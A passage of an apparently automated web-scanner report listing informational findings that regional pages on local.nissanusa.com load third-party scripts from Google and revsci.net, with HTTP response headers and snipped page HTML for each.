<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.231. http://local.nissanusa.com/little-rock-pine-bluff-ar-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/little-rock-pine-bluff-ar-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=72201; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/
Set-Cookie: localDMA=little-rock-pine-bluff-ar-area; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/
Content-Length: 109582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.232. http://local.nissanusa.com/los-angeles-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/los-angeles-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=90001; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/
Set-Cookie: localDMA=los-angeles-area; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/
Content-Length: 153308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.233. http://local.nissanusa.com/louisville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/louisville-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=40201; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Set-Cookie: localDMA=louisville-area; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Content-Length: 118285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.234. http://local.nissanusa.com/miami-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/miami-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33101; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Set-Cookie: localDMA=miami-area; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.235. http://local.nissanusa.com/milwaukee-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/milwaukee-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=53201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=milwaukee-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 138619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.236. http://local.nissanusa.com/minneapolis-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/minneapolis-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=55401; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/
Set-Cookie: localDMA=minneapolis-area; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/
Content-Length: 109350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.237. http://local.nissanusa.com/nashville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/nashville-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=37201; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Set-Cookie: localDMA=nashville-area; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Content-Length: 119690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.238. http://local.nissanusa.com/new-orleans-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/new-orleans-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=70112; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/
Set-Cookie: localDMA=new-orleans-area; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/
Content-Length: 114343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.239. http://local.nissanusa.com/new-york-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/new-york-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=10001; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Set-Cookie: localDMA=new-york-area; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Content-Length: 217093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.240. http://local.nissanusa.com/norfolk-portsmouth-newport-news-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/norfolk-portsmouth-newport-news-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=23501; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/
Set-Cookie: localDMA=norfolk-portsmouth-newport-news-area; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/
Content-Length: 115633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.241. http://local.nissanusa.com/oklahoma-city-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/oklahoma-city-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=73101; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/
Set-Cookie: localDMA=oklahoma-city-area; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/
Content-Length: 107751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.242. http://local.nissanusa.com/orlando-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/orlando-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=32801; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Set-Cookie: localDMA=orlando-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Content-Length: 131647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.243. http://local.nissanusa.com/philadelphia-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/philadelphia-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=19101; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/
Set-Cookie: localDMA=philadelphia-area; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/
Content-Length: 205265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.244. http://local.nissanusa.com/phoenix-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/phoenix-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=85001; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/
Set-Cookie: localDMA=phoenix-area; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/
Content-Length: 116937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.245. http://local.nissanusa.com/pittsburgh-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/pittsburgh-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=15201; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/
Set-Cookie: localDMA=pittsburgh-area; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/
Content-Length: 118838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.246. http://local.nissanusa.com/portland-or-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/portland-or-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=97201; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/
Set-Cookie: localDMA=portland-or-area; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/
Content-Length: 117033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.247. http://local.nissanusa.com/providence-new-bedford-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/providence-new-bedford-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=02901; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/
Set-Cookie: localDMA=providence-new-bedford-area; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/
Content-Length: 162269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.248. http://local.nissanusa.com/sacramento-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/sacramento-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

18.249. http://local.nissanusa.com/salt-lake-city-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/salt-lake-city-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=84101; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/
Set-Cookie: localDMA=salt-lake-city-area; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/
Content-Length: 109201

